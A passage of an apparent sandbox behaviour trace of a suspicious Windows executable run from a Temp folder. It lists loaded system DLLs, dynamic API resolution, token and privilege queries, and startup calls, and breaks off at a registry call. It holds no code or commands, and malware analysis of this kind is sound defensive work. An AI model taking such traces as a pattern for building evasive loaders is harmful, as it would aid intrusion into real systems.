start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5307 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5308 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5309 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5310 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5311 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5312 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5313 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5314 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5315 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5316 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5317 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5318 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 5319 start_va = 0x6f0000 end_va = 0x12effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 5320 start_va = 0x12f0000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 5321 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5322 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5323 start_va = 0x1430000 end_va = 0x165ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 5324 start_va = 0x1660000 end_va = 0x192efff entry_point = 0x1660000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5325 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 5326 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5337 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x2a0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 5338 start_va = 0x1430000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 5339 start_va = 0x1620000 end_va = 0x165ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 5340 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5341 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 5342 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5343 start_va = 0x1930000 end_va = 0x1a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 5344 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5345 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5432 start_va = 0x1a50000 end_va = 0x1b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 5433 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5434 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 53 os_tid = 0xcc4 [0108.791] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.796] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.796] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.798] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.798] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0108.798] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0108.798] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0108.799] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0108.799] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0108.799] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0108.799] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0108.800] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0108.800] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0108.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0108.800] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0108.800] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0108.800] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0108.800] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0108.800] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0108.800] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0108.801] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0108.801] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0108.801] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0108.801] SetThreadLocale (Locale=0x400) returned 1 [0108.802] GetVersion () returned 0x1db10106 [0108.802] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.802] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0108.802] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.802] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0108.802] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.802] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0108.802] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0108.802] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.802] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0108.802] GetACP () returned 0x4e4 [0108.802] GetCurrentThreadId () returned 0xcc4 [0108.802] GetVersion () returned 0x1db10106 [0108.802] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x2e1cd0, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.802] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.802] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.803] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x12f0000 [0108.803] RegOpenKeyExW (in: hKey=0x80000001, 